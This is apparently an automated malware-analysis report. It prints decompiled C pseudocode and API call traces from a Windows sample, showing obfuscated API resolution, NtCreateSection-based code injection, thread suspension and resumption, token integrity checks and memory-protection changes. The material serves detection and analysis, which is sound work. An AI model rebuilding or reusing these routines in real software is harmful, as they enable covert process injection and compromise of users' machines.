                              • Instruction ID: 3271f097645ae61411ae19471f0bfabaaada5603eb204f10e0e66689fb44abbf
                              • Opcode Fuzzy Hash: f6966ec16159e187c1e4d36edb4ae5da0a30fecccd048c2486c6f61c616fd60c
                              • Instruction Fuzzy Hash: 83412CB2900709AFDF318F65DC44EAAFBF9FB08310F008615E656AA591DBB4E805CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 73%
                              			E049D87A1(void* __eax, void* __ecx) {
                              				long _v8;
                              				char _v12;
                              				void* _v16;
                              				void* _v28;
                              				long _v32;
                              				void _v104;
                              				char _v108;
                              				long _t36;
                              				intOrPtr _t40;
                              				intOrPtr _t47;
                              				intOrPtr _t50;
                              				void* _t58;
                              				void* _t68;
                              				intOrPtr* _t70;
                              				intOrPtr* _t71;
                              
                              				_t1 = __eax + 0x14; // 0x74183966
                              				_t69 =  *_t1;
                              				_t36 = E049D6CE5(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                              				_v8 = _t36;
                              				if(_t36 != 0) {
                              					L12:
                              					return _v8;
                              				}
                              				E049DAA99( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                              				_t40 = _v12(_v12);
                              				_v8 = _t40;
                              				if(_t40 == 0 && ( *0x49dd298 & 0x00000001) != 0) {
                              					_v32 = 0;
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					_v108 = 0;
                              					memset( &_v104, 0, 0x40);
                              					_t47 =  *0x49dd2b8; // 0xe3a5a8
                              					_t18 = _t47 + 0x49de3b3; // 0x73797325
                              					_t68 = E049D70F1(_t18);
                              					if(_t68 == 0) {
                              						_v8 = 8;
                              					} else {
                              						_t50 =  *0x49dd2b8; // 0xe3a5a8
                              						_t19 = _t50 + 0x49de760; // 0x5818d08
                              						_t20 = _t50 + 0x49de0af; // 0x4e52454b
                              						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                              						if(_t71 == 0) {
                              							_v8 = 0x7f;
                              						} else {
                              							_v108 = 0x44;
                              							E049D2522();
                              							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                              							_push(1);
                              							E049D2522();
                              							if(_t58 == 0) {
                              								_v8 = GetLastError();
                              							} else {
                              								CloseHandle(_v28);
                              								CloseHandle(_v32);
                              							}
                              						}
                              						HeapFree( *0x49dd270, 0, _t68);
                              					}
                              				}
                              				_t70 = _v16;
                              				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                              				E049D6DFA(_t70);
                              				goto L12;
                              			}


                              APIs
                                • Part of subcall function 049D6CE5: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049D87BD,?,?,?,?,00000000,00000000), ref: 049D6D0A
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,7243775A), ref: 049D6D2C
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,614D775A), ref: 049D6D42
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049D6D58
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049D6D6E
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049D6D84
                              • memset.NTDLL ref: 049D880B
                                • Part of subcall function 049D70F1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,049D8824,73797325), ref: 049D7102
                                • Part of subcall function 049D70F1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 049D711C
                              • GetModuleHandleA.KERNEL32(4E52454B,05818D08,73797325), ref: 049D8841
                              • GetProcAddress.KERNEL32(00000000), ref: 049D8848
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049D88B0
                                • Part of subcall function 049D2522: GetProcAddress.KERNEL32(36776F57,049D6342), ref: 049D253D
                              • CloseHandle.KERNEL32(00000000,00000001), ref: 049D888D
                              • CloseHandle.KERNEL32(?), ref: 049D8892
                              • GetLastError.KERNEL32(00000001), ref: 049D8896
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                              • String ID: Uxt
                              • API String ID: 3075724336-1536154274
                              • Opcode ID: a14a61b8a4389b3131a201ebdf0d3371671cce540cb9325f69201935cdfee4ac
                              • Instruction ID: 82c52208d450bc852bfc69837bb78ed942bc308d3ff8fc46bddb2b0572625af5
                              • Opcode Fuzzy Hash: a14a61b8a4389b3131a201ebdf0d3371671cce540cb9325f69201935cdfee4ac
                              • Instruction Fuzzy Hash: 43311BB6904208BFEF11EFA4DC88D9EBBBCEB48344F148575E616A7151D734AD44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E049D5C7F(intOrPtr __edx, void** _a4, void** _a8) {
                              				intOrPtr _v8;
                              				struct _FILETIME* _v12;
                              				short _v56;
                              				struct _FILETIME* _t12;
                              				intOrPtr _t13;
                              				void* _t17;
                              				void* _t21;
                              				intOrPtr _t27;
                              				long _t28;
                              				void* _t30;
                              
                              				_t27 = __edx;
                              				_t12 =  &_v12;
                              				GetSystemTimeAsFileTime(_t12);
                              				_push(0x192);
                              				_push(0x54d38000);
                              				_push(_v8);
                              				_push(_v12);
                              				L049DB02A();
                              				_push(_t12);
                              				_v12 = _t12;
                              				_t13 =  *0x49dd2b8; // 0xe3a5a8
                              				_t5 = _t13 + 0x49de876; // 0x5818e1e
                              				_t6 = _t13 + 0x49de59c; // 0x530025
                              				_push(0x16);
                              				_push( &_v56);
                              				_v8 = _t27;
                              				L049DAD4A();
                              				_t17 = CreateFileMappingW(0xffffffff, 0x49dd2e4, 4, 0, 0x1000,  &_v56); // executed
                              				_t30 = _t17;
                              				if(_t30 == 0) {
                              					_t28 = GetLastError();
                              				} else {
                              					if(GetLastError() == 0xb7) {
                              						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                              						if(_t21 == 0) {
                              							_t28 = GetLastError();
                              							if(_t28 != 0) {
                              								goto L6;
                              							}
                              						} else {
                              							 *_a4 = _t30;
                              							 *_a8 = _t21;
                              							_t28 = 0;
                              						}
                              					} else {
                              						_t28 = 2;
                              						L6:
                              						CloseHandle(_t30);
                              					}
                              				}
                              				return _t28;
                              			}


                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53,?,?), ref: 049D5C8B
                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049D5CA1
                              • _snwprintf.NTDLL ref: 049D5CC6
                              • CreateFileMappingW.KERNELBASE(000000FF,049DD2E4,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 049D5CE2
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53,?), ref: 049D5CF4
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 049D5D0B
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53), ref: 049D5D2C
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53,?), ref: 049D5D34
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: c17600c969450e4b59c268dbf43343dc3069e4118fe24fc22b3bbc939d78323f
                              • Instruction ID: d634b7b4059a29d3d8a4f52900501c5e4ebc65d552481b2dc092b054b7298a04
                              • Opcode Fuzzy Hash: c17600c969450e4b59c268dbf43343dc3069e4118fe24fc22b3bbc939d78323f
                              • Instruction Fuzzy Hash: 4921A572605204BBEB11EF64DC09F9D7BB9EB88760F158231F606EB1D0EA70E945CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E4E7E: VirtualProtect.KERNEL32(?,?,00000040,00000000,011075A8,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EA3
                                • Part of subcall function 053E4E7E: GetLastError.KERNEL32(?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EAB
                                • Part of subcall function 053E4E7E: VirtualQuery.KERNEL32(?,011075A8,0000001C,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EC2
                                • Part of subcall function 053E4E7E: VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EE7
                              • GetLastError.KERNEL32(00000000,00000004,053EF518,?,053EF4B4,00000000,00000002,053EC578,0000001C,053D496D,00000002,?,00000001,?,053EF514,?), ref: 053CAF38
                                • Part of subcall function 053D4B11: lstrlen.KERNEL32(?,00000004,053CB24B,00000004,00000000), ref: 053D4B49
                                • Part of subcall function 053D4B11: lstrcpy.KERNEL32(00000000,?), ref: 053D4B60
                                • Part of subcall function 053D4B11: StrChrA.SHLWAPI(00000000,0000002E), ref: 053D4B69
                                • Part of subcall function 053D4B11: GetModuleHandleA.KERNEL32(00000000), ref: 053D4B87
                              • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000000,00000000,00000004,053EF518,?,053EF4B4), ref: 053CAEB6
                              • VirtualProtect.KERNEL32(00000000,00000004,053EF518,053EF518,?,00000000,00000000,00000004,053EF518,?,053EF4B4,00000000,00000002,053EC578,0000001C,053D496D), ref: 053CAED1
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053CAEF5
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053CAF13
                                • Part of subcall function 053E4E7E: SetLastError.KERNEL32(?,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EF0
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                              • String ID:
                              • API String ID: 899430048-3916222277
                              • Opcode ID: 80ac21a98713566d1b8433817530cd587c14a5cfdc9778eda9e9a7a4f946f27f
                              • Instruction ID: 3c026446d0e41af270b4c01c74806ad2993afd5737d86babd34fe197337b82b3
                              • Opcode Fuzzy Hash: 80ac21a98713566d1b8433817530cd587c14a5cfdc9778eda9e9a7a4f946f27f
                              • Instruction Fuzzy Hash: C7414AB1900619AFDB11DF68C848AAEBFF8FF48310F148159F815AB290DB70E950CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E67CD: GetProcAddress.KERNEL32(?,00000318), ref: 053E67F2
                                • Part of subcall function 053E67CD: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 053E680E
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D4428
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 053D4513
                                • Part of subcall function 053E67CD: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 053E6978
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 053D445E
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D446A
                              • lstrcmpi.KERNEL32(?,00000000), ref: 053D44A7
                              • StrChrA.SHLWAPI(?,0000002E), ref: 053D44B0
                              • lstrcmpi.KERNEL32(?,00000000), ref: 053D44C2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                              • String ID:
                              • API String ID: 3901270786-0
                              • Opcode ID: 471b3346cfdb05a8c0baa601c8e2ddd16f4061e4ed88adf681f7755c4c42d73b
                              • Instruction ID: eea5b88aa60860a013b31b8a594b9e9d91121afc8da631774d4b4bc7b0cac78c
                              • Opcode Fuzzy Hash: 471b3346cfdb05a8c0baa601c8e2ddd16f4061e4ed88adf681f7755c4c42d73b
                              • Instruction Fuzzy Hash: AA318D72508311ABD721CF11E845B2BFBF9FF88B54F010919F985AA280D7B4E954CAB6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053C2E31: memset.NTDLL ref: 053C2E3B
                              • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,053C8ECE,?,00000000), ref: 053D9C48
                              • SetEvent.KERNEL32(00000000,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C55
                              • Sleep.KERNEL32(00000BB8,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C60
                              • ResetEvent.KERNEL32(00000000,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C67
                              • CloseHandle.KERNEL32(00000000,?,053C8ECE,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053D9C6E
                              • GetShellWindow.USER32 ref: 053D9C79
                              • GetWindowThreadProcessId.USER32(00000000), ref: 053D9C80
                                • Part of subcall function 053C33D9: RegCloseKey.ADVAPI32(?,?,?), ref: 053C345C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                              • String ID:
                              • API String ID: 53838381-0
                              • Opcode ID: a8eaddf1f2d807889735469da5993ad79eb91ee8a4a701abb8606ec97c5504d5
                              • Instruction ID: 9487b4290c505b271332ce89d5ef997da60542b9557e309fd9d8056e4b5b3e33
                              • Opcode Fuzzy Hash: a8eaddf1f2d807889735469da5993ad79eb91ee8a4a701abb8606ec97c5504d5
                              • Instruction Fuzzy Hash: 62216077214218ABC225ABAAAC4EF2BBFADABC9715F054009F50B9F141CE7558008B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D4DCF(long* _a4) {
                              				long _v8;
                              				void* _v12;
                              				void _v16;
                              				long _v20;
                              				int _t33;
                              				void* _t46;
                              
                              				_v16 = 1;
                              				_v20 = 0x2000;
                              				if( *0x49dd294 > 5) {
                              					_v16 = 0;
                              					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                              						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                              						_v8 = 0;
                              						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                              						if(_v8 != 0) {
                              							_t46 = E049D55DC(_v8);
                              							if(_t46 != 0) {
                              								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                              								if(_t33 != 0) {
                              									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                              								}
                              								E049D6DFA(_t46);
                              							}
                              						}
                              						CloseHandle(_v12);
                              					}
                              				}
                              				 *_a4 = _v20;
                              				return _v16;
                              			}
                              0x049d4ddc
                              0x049d4de3
                              0x049d4dea
                              0x049d4dfe
                              0x049d4e09
                              0x049d4e21
                              0x049d4e2e
                              0x049d4e31
                              0x049d4e36
                              0x049d4e41
                              0x049d4e45
                              0x049d4e54
                              0x049d4e58
                              0x049d4e74
                              0x049d4e74
                              0x049d4e78
                              0x049d4e78
                              0x049d4e7d
                              0x049d4e81
                              0x049d4e87
                              0x049d4e88
                              0x049d4e8f
                              0x049d4e95

                              APIs
                              • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 049D4E01
                              • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 049D4E21
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 049D4E31
                              • CloseHandle.KERNEL32(00000000), ref: 049D4E81
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 049D4E54
                              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 049D4E5C
                              • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 049D4E6C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                              • String ID:
                              • API String ID: 1295030180-0
                              • Opcode ID: a73ab3bac372690e26098ff6ceca68415aeb3a25d1a59b993b4a81ca287d36b0
                              • Instruction ID: 37ca8be9cb0c80579f96800d3de84d58e9ce6a992dd1dc39528f65152a647f8d
                              • Opcode Fuzzy Hash: a73ab3bac372690e26098ff6ceca68415aeb3a25d1a59b993b4a81ca287d36b0
                              • Instruction Fuzzy Hash: 38214875900218FFEB009FA4ED48EAEBFBDEB48314F0041B6E900A6150C7759E55DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053D3B68
                                • Part of subcall function 053C54B6: GetModuleHandleA.KERNEL32(?,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C54D7
                                • Part of subcall function 053C54B6: GetProcAddress.KERNEL32(00000000,?), ref: 053C54F0
                                • Part of subcall function 053C54B6: OpenProcess.KERNEL32(00000400,00000000,053D3B88,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C550D
                                • Part of subcall function 053C54B6: IsWow64Process.KERNEL32(00000000,00000000,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C551E
                                • Part of subcall function 053C54B6: CloseHandle.KERNEL32(00000000,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C5531
                              • ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,053F01F4,?,00000000), ref: 053D3C21
                              • WaitForSingleObject.KERNEL32(00000064), ref: 053D3C2F
                              • SuspendThread.KERNEL32(?), ref: 053D3C42
                                • Part of subcall function 053CD551: NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 053CD7CD
                                • Part of subcall function 053CD551: memset.NTDLL ref: 053CD7F5
                              • ResumeThread.KERNEL32(?), ref: 053D3CC4
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSectionSingleSuspendUnmapViewWaitWow64
                              • String ID:
                              • API String ID: 664769717-0
                              • Opcode ID: 4cd09be1dba08965b4d9f63c7fae1a2a46111086fa0e84de566a321cb98a7581
                              • Instruction ID: 142d775d46476aaf66a377dcfc3b614f94cab985464c9dd475b2c2e26f2b11eb
                              • Opcode Fuzzy Hash: 4cd09be1dba08965b4d9f63c7fae1a2a46111086fa0e84de566a321cb98a7581
                              • Instruction Fuzzy Hash: 38418072A0020CABDF22DF54ED88EAEBBBAFB04300F144869F91697150DB75DE55CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 049D4176: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058189D4,049D6FE2,?,?,?,?,?,?,?,?,?,?,?,049D6FE2), ref: 049D4242
                                • Part of subcall function 049D5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049D5FAF
                                • Part of subcall function 049D5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049D5FE0
                              • SysAllocString.OLEAUT32(00000000), ref: 049D700E
                              • SysAllocString.OLEAUT32(0070006F), ref: 049D7022
                              • SysAllocString.OLEAUT32(00000000), ref: 049D7034
                              • SysFreeString.OLEAUT32(00000000), ref: 049D7098
                              • SysFreeString.OLEAUT32(00000000), ref: 049D70A7
                              • SysFreeString.OLEAUT32(00000000), ref: 049D70B2
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                              • String ID:
                              • API String ID: 2831207796-0
                              • Opcode ID: 3ff311036757d2d27e30fee969b223e2e94b8687a27deb4a9f16b5f57c2c77ba
                              • Instruction ID: f2614c08c5c6e68a84ebedbf2acf195c9da7f5ab62121363ae8387fd908c37fb
                              • Opcode Fuzzy Hash: 3ff311036757d2d27e30fee969b223e2e94b8687a27deb4a9f16b5f57c2c77ba
                              • Instruction Fuzzy Hash: 1B313D32900609AFDF01DFF8C844A9EBBBAAF49310F158475ED10EB160DB75AD45CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,?,053EF4B4,00000000,?,053EC588,00000018,053E3641,?,00000002,053EF518,00000003,053EF514,00000000,011075A8), ref: 053CC74B
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,011075A8,?,?,053EF4B4,00000000,?,053EC588,00000018,053E3641), ref: 053CC7D6
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053CC7FE
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053CC81C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                              • String ID:
                              • API String ID: 3666628472-0
                              • Opcode ID: 4f71c372e52c51d54d4113b849ec839a92882928caacf5c9efb840df5eb979bd
                              • Instruction ID: be13fdbb8292849608fc6e1aa40c2858879acafc24cd25d9b72cf4bb82ecacfb
                              • Opcode Fuzzy Hash: 4f71c372e52c51d54d4113b849ec839a92882928caacf5c9efb840df5eb979bd
                              • Instruction Fuzzy Hash: F2410771A00719AFCB11DF65C888AAEBBF9BF48700B108559E52AEB650DB709D51CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D6CE5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                              				intOrPtr _v8;
                              				intOrPtr _t23;
                              				intOrPtr _t26;
                              				_Unknown_base(*)()* _t28;
                              				intOrPtr _t30;
                              				_Unknown_base(*)()* _t32;
                              				intOrPtr _t33;
                              				_Unknown_base(*)()* _t35;
                              				intOrPtr _t36;
                              				_Unknown_base(*)()* _t38;
                              				intOrPtr _t39;
                              				_Unknown_base(*)()* _t41;
                              				intOrPtr _t44;
                              				struct HINSTANCE__* _t48;
                              				intOrPtr _t54;
                              
                              				_t54 = E049D55DC(0x20);
                              				if(_t54 == 0) {
                              					_v8 = 8;
                              				} else {
                              					_t23 =  *0x49dd2b8; // 0xe3a5a8
                              					_t1 = _t23 + 0x49de11a; // 0x4c44544e
                              					_t48 = GetModuleHandleA(_t1);
                              					_t26 =  *0x49dd2b8; // 0xe3a5a8
                              					_t2 = _t26 + 0x49de782; // 0x7243775a
                              					_v8 = 0x7f;
                              					_t28 = GetProcAddress(_t48, _t2);
                              					 *(_t54 + 0xc) = _t28;
                              					if(_t28 == 0) {
                              						L8:
                              						E049D6DFA(_t54);
                              					} else {
                              						_t30 =  *0x49dd2b8; // 0xe3a5a8
                              						_t5 = _t30 + 0x49de76f; // 0x614d775a
                              						_t32 = GetProcAddress(_t48, _t5);
                              						 *(_t54 + 0x10) = _t32;
                              						if(_t32 == 0) {
                              							goto L8;
                              						} else {
                              							_t33 =  *0x49dd2b8; // 0xe3a5a8
                              							_t7 = _t33 + 0x49de4ce; // 0x6e55775a
                              							_t35 = GetProcAddress(_t48, _t7);
                              							 *(_t54 + 0x14) = _t35;
                              							if(_t35 == 0) {
                              								goto L8;
                              							} else {
                              								_t36 =  *0x49dd2b8; // 0xe3a5a8
                              								_t9 = _t36 + 0x49de406; // 0x4e6c7452
                              								_t38 = GetProcAddress(_t48, _t9);
                              								 *(_t54 + 0x18) = _t38;
                              								if(_t38 == 0) {
                              									goto L8;
                              								} else {
                              									_t39 =  *0x49dd2b8; // 0xe3a5a8
                              									_t11 = _t39 + 0x49de792; // 0x6c43775a
                              									_t41 = GetProcAddress(_t48, _t11);
                              									 *(_t54 + 0x1c) = _t41;
                              									if(_t41 == 0) {
                              										goto L8;
                              									} else {
                              										 *((intOrPtr*)(_t54 + 4)) = _a4;
                              										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                              										_t44 = E049D7562(_t54, _a8); // executed
                              										_v8 = _t44;
                              										if(_t44 != 0) {
                              											goto L8;
                              										} else {
                              											 *_a12 = _t54;
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _v8;
                              			}
                              0x049d6cf4
                              0x049d6cf8
                              0x049d6dba
                              0x049d6cfe
                              0x049d6cfe
                              0x049d6d03
                              0x049d6d16
                              0x049d6d18
                              0x049d6d1d
                              0x049d6d25
                              0x049d6d2c
                              0x049d6d30
                              0x049d6d33
                              0x049d6db2
                              0x049d6db3
                              0x049d6d35
                              0x049d6d35
                              0x049d6d3a
                              0x049d6d42
                              0x049d6d46
                              0x049d6d49
                              0x00000000
                              0x049d6d4b
                              0x049d6d4b
                              0x049d6d50
                              0x049d6d58
                              0x049d6d5c
                              0x049d6d5f
                              0x00000000
                              0x049d6d61
                              0x049d6d61
                              0x049d6d66
                              0x049d6d6e
                              0x049d6d72
                              0x049d6d75
                              0x00000000
                              0x049d6d77
                              0x049d6d77
                              0x049d6d7c
                              0x049d6d84
                              0x049d6d88
                              0x049d6d8b
                              0x00000000
                              0x049d6d8d
                              0x049d6d93
                              0x049d6d98
                              0x049d6d9f
                              0x049d6da6
                              0x049d6da9
                              0x00000000
                              0x049d6dab
                              0x049d6dae
                              0x049d6dae
                              0x049d6da9
                              0x049d6d8b
                              0x049d6d75
                              0x049d6d5f
                              0x049d6d49
                              0x049d6d33
                              0x049d6dc8

                              APIs
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049D87BD,?,?,?,?,00000000,00000000), ref: 049D6D0A
                              • GetProcAddress.KERNEL32(00000000,7243775A), ref: 049D6D2C
                              • GetProcAddress.KERNEL32(00000000,614D775A), ref: 049D6D42
                              • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049D6D58
                              • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049D6D6E
                              • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049D6D84
                                • Part of subcall function 049D7562: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,049D6DA4), ref: 049D75BF
                                • Part of subcall function 049D7562: memset.NTDLL ref: 049D75E1
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: 37a417933cc3d5ab56ffc5e8660b08e38e3a5a9d3fcb2692b395bad732446ed0
